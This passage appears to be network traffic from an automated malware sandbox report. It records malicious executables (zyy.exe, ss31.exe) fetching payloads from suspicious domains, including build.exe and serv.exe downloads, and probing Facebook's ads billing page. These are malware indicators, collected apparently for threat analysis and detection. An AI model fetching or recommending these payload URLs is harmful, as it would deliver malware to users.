                                    j.ffbbjjkk.com
                                    zyy.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    j.ffbbjjkk.com
                                    IN A
                                    Response
                                    j.ffbbjjkk.com
                                    IN A
                                    172.67.158.22
                                    j.ffbbjjkk.com
                                    IN A
                                    104.21.8.227
                                  • flag-us
                                    GET
                                    https://j.ffbbjjkk.com/2701.html
                                    zyy.exe
                                    Remote address:
                                    172.67.158.22:443
                                    Request
                                    GET /2701.html HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: j.ffbbjjkk.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Length: 571255
                                    Connection: keep-alive
                                    Last-Modified: Wed, 08 Mar 2023 18:28:12 GMT
                                    ETag: "8b777-5f667b0cf6700"
                                    Accept-Ranges: bytes
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fktt7MsnsiQ6S18LESyhWk7x2O3OEoi00ztyf1u2xdXDU77V%2B0MNnF8Ijxv1Grj77A8gc%2BvBffueBpb%2FKEt8taZmtzJX3G%2BBoRVW1jI6SPJcmoBRn5j73u%2BkyirpJxaQ9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da17df7eb975-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    GET
                                    https://j.ffbbjjkk.com/logo.png
                                    zyy.exe
                                    Remote address:
                                    172.67.158.22:443
                                    Request
                                    GET /logo.png HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: j.ffbbjjkk.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:04 GMT
                                    Content-Type: image/png
                                    Content-Length: 59217
                                    Connection: keep-alive
                                    Last-Modified: Tue, 31 Jan 2023 07:35:43 GMT
                                    ETag: "e751-5f38a611cd3c7"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: REVALIDATED
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=70utFY0Lq%2BBVvfwcNf%2Fb8th87tsVePLED2Dfut2s7bjVM1tWH2MJd5sNmJFgRSyb2XZFG1qmQScEDpGkqc1SYtKvV5%2BB%2FOS%2F13K0rwjpIhTDlbrCfbCKxXdoM0fs%2BhGHGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da2218c1b975-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    GET
                                    https://j.ffbbjjkk.com/2701.html
                                    zyy.exe
                                    Remote address:
                                    172.67.158.22:443
                                    Request
                                    GET /2701.html HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: j.ffbbjjkk.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Length: 571255
                                    Connection: keep-alive
                                    Last-Modified: Wed, 08 Mar 2023 18:28:12 GMT
                                    ETag: "8b777-5f667b0cf6700"
                                    Accept-Ranges: bytes
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PZTMKmUaiywUPsn3dxkDbY3XdeSaKAR76JuBLpvFqHe4y4eW0rUb8ujKz0Wx6MTA7w9hk0kN%2BNauLVLyoF081fGZwzEMICd5mitFrXl1M07IUULM2QMSLRB2mUzhxWxcbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da17cd6d4160-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    GET
                                    https://j.ffbbjjkk.com/logo.png
                                    zyy.exe
                                    Remote address:
                                    172.67.158.22:443
                                    Request
                                    GET /logo.png HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: j.ffbbjjkk.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:04 GMT
                                    Content-Type: image/png
                                    Content-Length: 59217
                                    Connection: keep-alive
                                    Last-Modified: Tue, 31 Jan 2023 07:35:43 GMT
                                    ETag: "e751-5f38a611cd3c7"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: REVALIDATED
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pg7u5DGxysqpk11PVfBbFoC%2FSpfByXffmaqug2IGe9adqOaTqBEBwDAkP7Y226zpUB1yx7IjS1pUCh79u6c%2FFHxoRKrmurcB57Z4gwjo7sDEvzA1OUfnxPlZZIbeLzJAsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da21ffc64160-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    GET
                                    http://bz.bbbeioaag.com/sts/bimage.jpg
                                    ss31.exe
                                    Remote address:
                                    45.136.113.107:80
                                    Request
                                    GET /sts/bimage.jpg HTTP/1.1
                                    User-Agent: HTTPREAD
                                    Host: bz.bbbeioaag.com
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.14.0 (Ubuntu)
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Type: image/jpeg
                                    Content-Length: 1516748
                                    Last-Modified: Mon, 06 Mar 2023 16:48:18 GMT
                                    Connection: keep-alive
                                    ETag: "64061952-1724cc"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    GET
                                    http://bz.bbbeioaag.com/sts/bimage.jpg
                                    ss31.exe
                                    Remote address:
                                    45.136.113.107:80
                                    Request
                                    GET /sts/bimage.jpg HTTP/1.1
                                    User-Agent: HTTPREAD
                                    Host: bz.bbbeioaag.com
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.14.0 (Ubuntu)
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Type: image/jpeg
                                    Content-Length: 1516748
                                    Last-Modified: Mon, 06 Mar 2023 16:48:18 GMT
                                    Connection: keep-alive
                                    ETag: "64061952-1724cc"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    DNS
                                    22.158.67.172.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    22.158.67.172.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    107.113.136.45.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    107.113.136.45.in-addr.arpa
                                    IN PTR
                                    Response
                                    107.113.136.45.in-addr.arpa
                                    IN PTR
                                    107 113-136-45rdns scalablednscom
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:03 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Sun, 19 Mar 2023 04:00:03 GMT
                                    ETag: "c5800-5f738d856a728"
                                    Accept-Ranges: bytes
                                    Content-Length: 808960
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-us
                                    DNS
                                    y1.ffbbyykk.com
                                    WspService
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    y1.ffbbyykk.com
                                    IN A
                                    Response
                                    y1.ffbbyykk.com
                                    IN A
                                    34.142.181.181
                                  • flag-us
                                    DNS
                                    y1.ffbbyykk.com
                                    WspService
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    y1.ffbbyykk.com
                                    IN AAAA
                                    Response
                                  • flag-us
                                    DNS
                                    52.4.107.13.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    52.4.107.13.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    181.181.142.34.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    181.181.142.34.in-addr.arpa
                                    IN PTR
                                    Response
                                    181.181.142.34.in-addr.arpa
                                    IN PTR
                                    18118114234bcgoogleusercontentcom
                                  • flag-us
                                    DNS
                                    ebfertility.com
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ebfertility.com
                                    IN A
                                    Response
                                    ebfertility.com
                                    IN A
                                    89.190.157.61
                                  • flag-us
                                    GET
                                    http://ebfertility.com/portline-containers.com/serv.exe
                                    Remote address:
                                    89.190.157.61:80
                                    Request
                                    GET /portline-containers.com/serv.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: ebfertility.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:08 GMT
                                    Server: Apache
                                    Last-Modified: Sun, 19 Mar 2023 04:00:03 GMT
                                    Accept-Ranges: bytes
                                    Content-Length: 362496
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdownload
                                  • flag-us
                                    DNS
                                    61.157.190.89.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    61.157.190.89.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    www.facebook.com
                                    ss31.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    www.facebook.com
                                    IN A
                                    Response
                                    www.facebook.com
                                    IN CNAME
                                    star-mini.c10r.facebook.com
                                    star-mini.c10r.facebook.com
                                    IN A
                                    157.240.5.35
                                  • flag-us
                                    GET
                                    https://www.facebook.com/ads/manager/account_settings/account_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /ads/manager/account_settings/account_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Response
                                    HTTP/1.1 302 Found
                                    Set-Cookie: sb=q4oWZO-iREt03mw-eetDT-Jn; expires=Tue, 18-Mar-2025 04:08:11 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-resource-policy: same-origin
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: 2xbeN3ZJic5IcD5/RTv6Z0Y2zcNpiC1kDRKq+eSGB1AOj/Swsd66yAiCY2OCBuVkrl1GqXdxl7jOdeSRFS5ScA==
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                    Content-Length: 0
                                  • flag-us
                                    GET
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Cookie: sb=q4oWZO-iREt03mw-eetDT-Jn
                                    Response
                                    HTTP/1.1 200 OK
                                    Vary: Accept-Encoding
                                    Set-Cookie: fr=0KNY5JpwM6swCwmMA..BkFoqr.vQ.AAA.0.0.BkFoqr.AWWLAO-QH24; expires=Sat, 17-Jun-2023 04:08:10 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'unsafe-eval';style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com https://sandbox.paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: zw5+jz2tcljoMeIt3zOn6dciqnTYe/Iu/DIh9/oZup4oqOK2VDc1f4nB4OLC1q4SmvcByxKMMVBS2u6rl96Euw==
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Transfer-Encoding: chunked
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                  • flag-us
                                    GET
                                    https://www.facebook.com/ads/manager/account_settings/account_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /ads/manager/account_settings/account_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Response
                                    HTTP/1.1 302 Found
                                    Set-Cookie: sb=s4oWZMRWUgPXJGwb_-jy7zCz; expires=Tue, 18-Mar-2025 04:08:19 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-resource-policy: same-origin
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: cIpQD/OMK41mPwZrOVTcAF83eSGPel1Tjlhf28fxXAuRy6ixBitV5j7BhIDXFPPByjg7USDT1cH2Zwz+vA8zyQ==
                                    Date: Sun, 19 Mar 2023 04:08:19 GMT
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                    Content-Length: 0
                                  • flag-us
                                    GET
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Cookie: sb=s4oWZMRWUgPXJGwb_-jy7zCz
                                    Response
                                    HTTP/1.1 200 OK
                                    Vary: Accept-Encoding
                                    Set-Cookie: fr=0aOKcXHW4WShsg5DQ..BkFoqz.i4.AAA.0.0.BkFoqz.AWWIFGmJVKc; expires=Sat, 17-Jun-2023 04:08:18 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'unsafe-eval';style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com https://sandbox.paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: ImtU60i3MJ39dAxf4qGnEuxix8dS5806QM0NN2cAlQPviVFyv1Mh9sB87ZI4J8UKeP+jXpi0uRSNqZSIBmLQZw==
                                    Date: Sun, 19 Mar 2023 04:08:20 GMT
                                    Priority: u=3,i
                                    Transfer-Encoding: chunked
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                  • flag-us
                                    GET
                                    https://www.facebook.com/ads/manager/account_settings/account_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /ads/manager/account_settings/account_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Response
                                    HTTP/1.1 302 Found
                                    Set-Cookie: sb=q4oWZEH1qCFBiHp4utzCPaCG; expires=Tue, 18-Mar-2025 04:08:11 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-resource-policy: same-origin
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: 0G70HNQJ5fgmrVRY8Omq9grz+y1/nxZVq50g5cytHRC97OHByuTxp+lxuINLL4HsTveu2sRLT68N5swKC5MqlA==
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                    Content-Length: 0
                                  • flag-us
                                    GET
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Cookie: sb=q4oWZEH1qCFBiHp4utzCPaCG
                                    Response
                                    HTTP/1.1 200 OK
                                    Vary: Accept-Encoding
                                    Set-Cookie: fr=0swkjYggLINWgeCqo..BkFoqr.jV.AAA.0.0.BkFoqr.AWXZUU1ECpU; expires=Sat, 17-Jun-2023 04:08:10 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
